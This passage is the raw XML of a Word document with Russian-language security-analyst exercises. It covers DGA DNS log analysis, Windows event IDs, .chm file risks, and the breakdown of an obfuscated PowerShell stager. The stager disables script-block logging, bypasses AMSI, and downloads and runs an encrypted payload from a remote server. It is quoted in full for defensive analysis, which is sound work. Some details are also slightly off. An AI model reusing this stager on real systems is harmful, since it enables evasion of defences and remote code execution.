отслеживания этого пакета.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Это может быть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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="00B050"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">Указывает,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:mggw-at-3833a2456f07be6cc414c99060cbf0f2.com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с IP-адресом 10.10.160.208выполнило обратный DNS-поиск для домена mggw-at-3833a2456f07be6cc414c99060cbf0f2.com. NXDOMAINОтвет указывает, что этот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по-видимому, динамически генерируется, вероятно, с использованием алгоритма генерации доменов (DGA). DGA обычно используются вредоносными программами для создания доменных имен, которые часто меняются, что затрудняет их отслеживание и блокировку.</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динамически генерируемых доменов позволяет предположить, что устройство может быть взломано и пытается связаться с сервером управления и контроля (C2) или другой вредоносной инфраструктурой.</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Определить и проверить : Определить, какое устройство соответствует этому IP-адресу. Исследуйте его на предмет признаков компрометации или необычного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вредоносных программ : выполните тщательное сканирование устройства на наличие вредоносных программ, чтобы выявить и удалить любые заражения.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Поиск других DNS-запросов с этого устройства, которые привели к NXDOMAINответам, особенно с похожими шаблонами. Это может помочь выявить более широкую схему подозрительной активности.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на наличие дополнительных аномалий или подозрительных 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отслеживание исходящего трафика с устройства для обнаружения подключений к подозрительным IP-адресам или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изолируйте его от сети, чтобы предотвратить дальнейший потенциальный ущерб или утечку данных.</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оповещения : ищите оповещения или необычные действия в журналах безопасности конечной точки, связанных с этим устройством. Это может предоставить дополнительный контекст или подтверждение наличия вредоносного ПО.</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наличие вредоносного ПО подтверждено, передайте ее своей группе реагирования на инциденты для принятия соответствующих мер сдерживания и устранения.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оцените, является ли эта активность частью более крупной атаки, и проверьте другие устройства в сети на предмет аналогичного подозрительного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10.10.160.208запрашивает динамически сгенерированный домен с помощью алгоритма генерации домена (DGA). Ответ NXDOMAINуказывает на то, что домен не существует, что может быть частью попытки вредоносной программы обнаружить сервер управления и контроля (C2). Необходимо немедленное расследование и реагирование, чтобы подтвердить, скомпрометировано ли устройство, и устранить любые потенциальные угрозы.</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__________________________________________________</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20.06.2019 9:26:24 0F0C PACKET 00000194D3CEDDD0 UDP Snd 10.10.160.208 3d56 R Q [8081 DR NXDOMAIN] PTR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Разбивка записей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Дата и время :20.06.2019 9:26:24</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Событие произошло 20 июня 2019 года в 9:26:24 утра.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журнала :0F0C</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этой записи журнала.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события :PACKET</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запись журнала относится к сетевому пакету.</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Адрес памяти :00000194D3CEDDD0</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Справочный адрес для пакета.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Протокол :UDP</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Пакет был отправлен с использованием протокола UDP (User Datagram Protocol), обычно используемого для DNS-запросов.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Действие : Snd(Отправить)</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что пакет был отправлен с исходного IP-адреса.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Исходный IP-адрес :1010.160.208</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Внутренний IP-адрес устройства, инициировавшего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Порт/ID транзакции :3d56</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Вероятно, представляет собой исходный порт или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Флаги/Код ответа :R Q [8081 DR NXDOMAIN]</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RQ : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="00B050"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">Указывает, что это ответ на DNS-запрос.</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8081 : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="00B050"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">Вероятно, идентификатор транзакции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DR : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="00B050"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">Может представлять собой флаг, связанный с DNS, или прямой ответ.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NXDOMAIN : DNS-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="00B050"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">сервер ответил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Несуществующий домен</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что указывает на то, что запрашиваемый домен не существует.</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Тип запроса :PTR</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Указывает на запрос записи PTR (указатель), используемый для обратного поиска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:mggw-at-f3f0c6e992b7562598d9865b6fe8b3a6.com</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Запрошенное доменное имя.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Интерпретация и анализ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Ошибка обратного поиска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Устройство по адресу IP 10.10.160.208сделало обратный запрос DNS для домена mggw-at-f3f0c6e992b7562598d9865b6fe8b3a6.com. Ответ NXDOMAINуказывает, что домен не существует в записях DNS.</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домен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Запрошенный домен, по-видимому, динамически генерируется, вероятно, с помощью алгоритма генерации домена (DGA). DGA часто используются вредоносными программами для генерации большого количества доменных имен для связи с серверами управления и контроля (C2).</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вредоносная активность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динамически генерируемых доменов и NXDOMAINответ позволяют предположить, что устройство может быть скомпрометировано и пытается связаться с сервером C2 или выполнить другие вредоносные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Исследуйте исходное устройство (10.10.160.208)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проверьте : определите, какое устройство соответствует этому IP-адресу, и проверьте его на наличие признаков взлома.</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Запустите сканирование на наличие вредоносных программ : выполните тщательное сканирование на наличие вредоносных программ, чтобы обнаружить и удалить любые заражения.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похожих запросов : Найдите другие DNS-запросы с этого устройства, которые привели к NXDOMAINответам, особенно с похожими шаблонами.</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трафика DNS : проверка трафика DNS для выявления дополнительных подозрительных запросов или шаблонов.</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сетевого трафика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исходящего трафика : отслеживание исходящего трафика с этого устройства для обнаружения подключений к подозрительным IP-адресам или доменам.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Рассмотрите возможность изоляции : если подтверждено, что устройство взломано, рассмотрите возможность его изоляции от сети, чтобы предотвратить дальнейший ущерб.</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безопасности конечной точки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оповещений : просмотрите журналы безопасности конечных точек на предмет любых оповещений или аномалий, связанных с этим устройством.</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 необходимости эскалируйте проблему : если наличие вредоносного ПО подтверждено, передайте проблему своей группе реагирования на инциденты для локализации и устранения.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более широкие последствия : определите, является ли эта активность частью более крупной атаки, и оцените другие устройства в сети на предмет аналогичного поведения.</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Запись в журнале предполагает, что устройство 10.10.160.208выполняет обратный поиск DNS для динамически сгенерированного домена с использованием алгоритма генерации домена (DGA). Ответ NXDOMAINуказывает на то, что домен не существует, что может быть частью попытки вредоносного ПО связаться с сервером управления и контроля (C2). Немедленное расследование и реагирование необходимы для подтверждения того, что устройство скомпрометировано, и для устранения любых потенциальных угроз.</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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="259"/>
        <w:ind w:right="0" w:left="144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1"/>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happening according to the following events?</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center"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:object w:dxaOrig="8908" w:dyaOrig="6033">
          <v:rect xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:v="urn:schemas-microsoft-com:vml" id="rectole0000000000" style="width:445.400000pt;height:30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990" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="259"/>
        <w:ind w:right="0" w:left="990" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:object w:dxaOrig="8908" w:dyaOrig="5608">
          <v:rect xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:v="urn:schemas-microsoft-com:vml" id="rectole0000000001" style="width:445.400000pt;height:28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59"/>
        <w:ind w:right="0" w:left="990" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="259"/>
        <w:ind w:right="0" w:left="990" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>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does this message mean? Is this suspicious? Why?</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center"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:object w:dxaOrig="7511" w:dyaOrig="4515">
          <v:rect xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:v="urn:schemas-microsoft-com:vml" id="rectole0000000002" style="width:375.550000pt;height:225.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993" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>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can you tell about logs below? </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r>
        <w:object w:dxaOrig="6094" w:dyaOrig="4899">
          <v:rect xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:v="urn:schemas-microsoft-com:vml" id="rectole0000000003" style="width:304.700000pt;height:24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990" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:object w:dxaOrig="7390" w:dyaOrig="5790">
          <v:rect xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:v="urn:schemas-microsoft-com:vml" id="rectole0000000004" style="width:369.500000pt;height:28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426" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:object w:dxaOrig="4981" w:dyaOrig="4758">
          <v:rect xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:v="urn:schemas-microsoft-com:vml" id="rectole0000000005" style="width:249.050000pt;height:237.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567" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="160" w:line="259"/>
        <w:ind w:right="0" w:left="99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can you tell about this script?</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($PSVersionTAbLE.PSVErsiON.MaJor-ge3) {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$GPF=[REF].AsSemBLY.GETTyPE('System.Management.Automation.Utils')."GETField"('cachedGroupPolicySettings','N'+'onPublic,Static');</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($GPF)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$GPC=$GPF.GEtVaLue($NULL);</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($GPC['ScriptB'+'lockLogging']) {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$GPC['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;</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$GPC['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0</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$vAl=[CoLLeCtionS.GENEric.DICtiONARy[striNg,SYstEm.ObjECT]]::nEw();</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$Val.ADd('EnableScriptB'+'lockLogging',0);</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$VAL.AdD('EnableScriptBlockInvocationLogging',0);</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$GPC['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB'+'lockLogging']=$VAl</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ELSe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[ScriPtBLocK]."GETFieLd"('signatures','NonPublic,Static').SEtValuE($Null,(New-OBjeCtColLEctIONs.GENERic.HaShSEt[sTrING]))</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[ReF].AsSembLY.GetTYpE('System.Management.Automation.AmsiUtils')|?{$_}| %{</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$_.GetFIelD('amsiInitFailed','NonPublic,Static').SeTValUe($NULL,$True)};</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[SysteM.NEt.SERvICePoInTMANAgeR]::ExPEcT100COntinUe=0;</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$WC=New-ObJECtSYstEm.NEt.WEBCLieNT;</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$u='Mozilla/5.0(WindowsNT6.1;WOW64;Trident/7.0;rv:11.0)likeGecko';</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$wc.HeAdErS.ADD('User-Agent',$u);</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$Wc.PRoXY=[SYstem.NEt.WEbRequESt]::DEfAulTWeBProxY;</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$wC.ProxY.CRedENTiAls=[SysTEM.NEt.CrEDeNTialCaCHE]::DEFAULtNeTworKCrEdEnTiaLs;</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$Script:Proxy=$wc.Proxy;</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$K=[SYsTEM.Text.ENcodiNg]::ASCII.GETBYtES('99754106633f94d350db34d548d6091a');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="259"/>
        <w:ind w:right="0" w:left="99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D,$K=$ArGs;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.CoUNt])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bXoR$S[($S[$I]+$S[$H])%256]}};$ser='http://10.6.100.123:80';$t='/news.php';$WC.HeadERS.AdD("Cookie","session=8xD4koAuu7qHah4KQzwZ/kDq4Oc=");$DAtA=$WC.DoWNloaDDAtA($SER+$T);$IV=$DatA[0..3];$datA=$DATa[4..$datA.lengTH];-join[ChAr[]](&amp;$R$daTA($IV+$K))|IEX</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Скрипт PowerShellявляется сложным примером передовой техники атаки. Вот подробный анализ того, что он делает:</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Разбор сценария</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версии и изменение реестра</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($PSVersonTAbLE.PSVErsiON.MaJor-ge3) {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$GPF=[REF].AsSemBLY.GETTyPE('System.Management.Automation.Utils')."GETField"('cachedGroupPolicySettings','N'+'onPublic,Static');</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If ($GPF)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$GPC=$GPF.GEtVaLue($NULL);</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IF ($GPC['ScriptB'+'lockLogging']) {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$GPC['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;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$GPC['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0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$vAl=[CoLLeCtionS.GENEric.DICtiONARy[striNg,SYstEm.ObjECT]]::nEw();</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$Val.ADd('EnableScriptB'+'lockLogging',0);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$VAL.AdD('EnableScriptBlockInvocationLogging',0);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$GPC['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB'+'lockLogging']=$VAl</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 ELSe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[ScriPtBLocK]."GETFieLd"('signatures','NonPublic,Static').SEtValuE($Null,(New-OBjeCtColLEctIONs.GENERic.HaShSEt[sTrING]))</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[ReF].AsSembLY.GetTYpE('System.Management.Automation.AmsiUtils')|?{$_}|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    $_.GetFIelD('amsiInitFailed','NonPublic,Static').SeTValUe($NULL,$True)};</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версии : эта часть проверяет, является ли версия PowerShell 3 или выше.</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реестра : если проверка версии пройдена, он пытается получить доступ и изменить внутренние настройки PowerShell, связанные с журналированием блоков скриптов. Он отключает журналирование блоков скриптов и журналирование вызовов, чтобы скрыть вредоносную активность.</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Обход AMSI : попытки обойти интерфейс сканирования на наличие вредоносных программ (AMSI) путем установки поля, указывающего на сбой инициализации AMSI.</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Конфигурация сети и настройки прокси-сервера</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[SysteM.NEt.SERvICePoInTMANAgeR]::ExPEcT100COntinUe=0;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$WC=New-ObJECtSYstEm.NEt.WEBCLieNT;</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$u='Mozilla/5.0(WindowsNT6.1;WOW64;Trident/7.0;rv:11.0)likeGecko';</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$wc.HeAdErS.ADD('User-Agent',$u);</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$Wc.PRoXY=[SYstem.NEt.WEbRequESt]::DEfAulTWeBProxY;</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$wC.ProxY.CRedENTiAls=[SysTEM.NEt.CrEDeNTialCaCHE]::DEFAULtNeTworKCrEdEnTiaLs;</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$Script:Proxy=$wc.Proxy;</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[SysteM.NEt.SERvICePoInTMANAgeR]::ExPEcT100COntinUe=0;</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$WC=New-ObJECtSYstEm.NEt.WEBCLieNT;</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$u='Mozilla/5.0(WindowsNT6.1;WOW64;Trident/7.0;rv:11.0)likeGecko';</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$wc.HeAdErS.ADD('User-Agent',$u);</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$Wc.PRoXY=[SYstem.NEt.WEbRequESt]::DEfAulTWeBProxY;</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$wC.ProxY.CRedENTiAls=[SysTEM.NEt.CrEDeNTialCaCHE]::DEFAULtNeTworKCrEdEnTiaLs;</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$Script:Proxy=$wc.Proxy;</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Настройки сети : настраивает WebClientобъект для сетевой связи. Настраивает User-Agentзаголовок так, чтобы он отображался как легитимный браузер, и использует настройки прокси-сервера по умолчанию с кэшированными сетевыми учетными данными.</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Загрузка и выполнение данных</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$K=[SYsTEM.Text.ENcodiNg]::ASCII.GETBYtES('99754106633f94d350db34d548d6091a');</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R={$D,$K=$ArGs;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.CoUNt])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bXoR$S[($S[$I]+$S[$H])%256]}};$ser='http://10.6.100.123:80';$t='/news.php';$WC.HeadERS.AdD("Cookie","session=8xD4koAuu7qHah4KQzwZ/kDq4Oc=");$DAtA=$WC.DoWNloaDDAtA($SER+$T);$IV=$DATa[0..3];$datA=$DATa[4..$datA.lengTH];-join[ChAr[]](&amp;$R$daTA($IV+$K))|IEX</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Настройка ключа шифрования : устанавливает ключ шифрования и функцию для расшифровки данных.</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Загрузить данные : Загружает данные с удаленного сервера ( </w:t>
      </w:r>
      <w:hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="docRId14">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
            <w:color w:val="00B050"/>
            <w:spacing w:val="0"/>
            <w:position w:val="0"/>
            <w:sz w:val="22"/>
            <w:u w:val="single"/>
            <w:shd w:fill="auto" w:val="clear"/>
          </w:rPr>
          <w:t xml:space="preserve">http://10.6.100.123:80/news.php</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="00B050"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">).</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Расшифровать и выполнить : загруженные данные расшифровываются с помощью предоставленной функции, а затем выполняются с помощью Invoke-Expression (IEX).</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Рекомендации по обнаружению и реагированию</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Немедленные действия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Изолируйте зараженную машину : отключите машину от сети, чтобы предотвратить дальнейшее взаимодействие с сервером злоумышленника и потенциальное распространение вредоносного ПО.</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Определите и удалите вредоносное ПО : используйте антивирусные или антивредоносные инструменты для сканирования и очистки пораженной системы.</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Исследование журналов и сетевой активности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сетевые журналы : найдите исходящие соединения 10.6.100.123или другие подозрительные IP-адреса.</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DNS : исследуйте DNS-запросы, которые могут быть связаны с вредоносной активностью.</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Меры безопасности обновления :</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и улучшите ведение журнала : убедитесь, что ведение журнала и мониторинг настроены правильно, чтобы обнаруживать подобные попытки в будущем.</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Исправление и укрепление систем : убедитесь, что все системы обновлены до последних обновлений безопасности.</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Проведите анализ после инцидента :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="259"/>
        <w:ind w:right="0" w:left="851" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="00B050"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
      </w:pP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вектора атаки : определение того, как злоумышленник изначально получил доступ, и устранение всех уязвимостей.</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Улучшение защиты : усиление контроля безопасности, включая сегментацию сети, обучение пользователей и защиту конечных точек.</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851" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="00B050"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="FF0000"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">Скрипт предназначен для обхода функций безопасности и выполнения загруженного вредоносного кода. Он изменяет настройки PowerShell для отключения ведения журнала, обходит AMSI и выполняет действия, чтобы скрыть свое присутствие. Немедленная изоляция пораженной машины, тщательное расследование и исправление имеют решающее значение для реагирования на этот тип передовой постоянной угрозы.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="259"/>
        <w:ind w:right="0" w:left="851"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 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="259"/>
        <w:ind w:right="0" w:left="851" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>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event id does registry modification has? What event id does service install and Service Failure has?</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 Windows различные типы системных событий регистрируются с определенными идентификаторами событий. Вот соответствующие идентификаторы событий для сценариев, о которых вы спрашивали:</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реестра</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4657 : это событие регистрируется, когда дескриптор объекта (например, раздела реестра) успешно открыт и обнаружено изменение объекта. Это может включать изменения разделов реестра и значений.</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Подробности : Событие с идентификатором 4657 предоставляет информацию о ключе или значении реестра, которые были изменены, старых и новых значениях, а также о пользователе, который внес изменение.</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Установка услуг</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7045 : Это событие регистрируется при установке новой службы. Оно содержит сведения о службе, включая ее имя, путь к исполняемому файлу и тип запуска.</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Подробности : Событие с идентификатором 7045 является частью журнала безопасности Windows и связано с установкой новой службы в системе.</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Сбой в работе сервиса</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7000 : это событие регистрируется, когда служба не запускается. Оно содержит сведения о службе, которая не запустилась, возвращаемый код ошибки и иногда краткое описание сбоя.</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Подробности : Событие с идентификатором 7000 также является частью системного журнала Windows и связано с ошибкой запуска службы во время процесса загрузки или во время выполнения.</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реестра : идентификатор события 4657</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Установка услуги : Код события 7045</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="259"/>
        <w:ind w:right="0" w:left="993"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Сбой обслуживания : идентификатор события 7000</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="259"/>
        <w:ind w:right="0" w:left="993"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Эти идентификаторы событий полезны для мониторинга и расследования изменений в системе и потенциальных инцидентов безопасности.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="259"/>
        <w:ind w:right="0" w:left="993"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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="259"/>
        <w:ind w:right="0" w:left="993" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="259"/>
        <w:ind w:right="0" w:left="993" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>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files with «chm» extension can be dangerous?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Файлы с .chm(скомпилированные .chmфайлы представляют угрозу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Встроенные скрипты и активный контент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JavaScript : .chm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="00B050"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">файлы могут содержать JavaScript, который может использоваться для выполнения вредоносных действий, таких как перенаправление пользователей на вредоносные веб-сайты или выполнение вредоносных скриптов.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HTML </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="00B050"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">и VBScript : .chmфайлы могут также включать HTML и VBScript, которые можно использовать для выполнения произвольного кода.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Уязвимости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Исторические эксплойты : .chmфайлы были связаны с известными уязвимостями в Windows HTML Help Viewer. Злоумышленники могут создавать .chmфайлы, которые используют эти уязвимости для выполнения кода в системе жертвы.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Переполнение буфера : некоторые уязвимости связаны с переполнением буфера, когда злоумышленник может использовать файл для выполнения кода, повредив память средства просмотра справки HTML.</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Социальная инженерия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Обманные полезные данные : .chmфайлы могут использоваться в фишинговых или социальных атаках, когда пользователей обманом заставляют открыть файл, который выглядит как легитимный, но на самом деле содержит вредоносный код.</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Вводящий в заблуждение контент : содержимое файла .chmможет выглядеть как законный документ, обманывая пользователей и заставляя их включать активный контент или нажимать на вредоносные ссылки.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Наборы эксплойтов и распространение вредоносного ПО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Файлы-дропперы : .chmфайлы иногда используются как файлы-дропперы, то есть они предназначены для загрузки и установки дополнительного вредоносного ПО в систему жертвы после открытия.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Наборы эксплойтов : злоумышленники могут использовать .chmфайлы как часть наборов эксплойтов для доставки и выполнения вредоносного ПО, используя известные уязвимости в средстве просмотра справки HTML.</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Неограниченное выполнение файлов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Отсутствие ограничений на выполнение : в отличие от некоторых других типов файлов, которые могут подчиняться строгим политикам выполнения или разрешениям пользователя, .chmфайлы могут быть выполнены с меньшим количеством ограничений, что делает их удобным вектором для злоумышленников.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Смягчение и защита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Отключить активное содержимое : 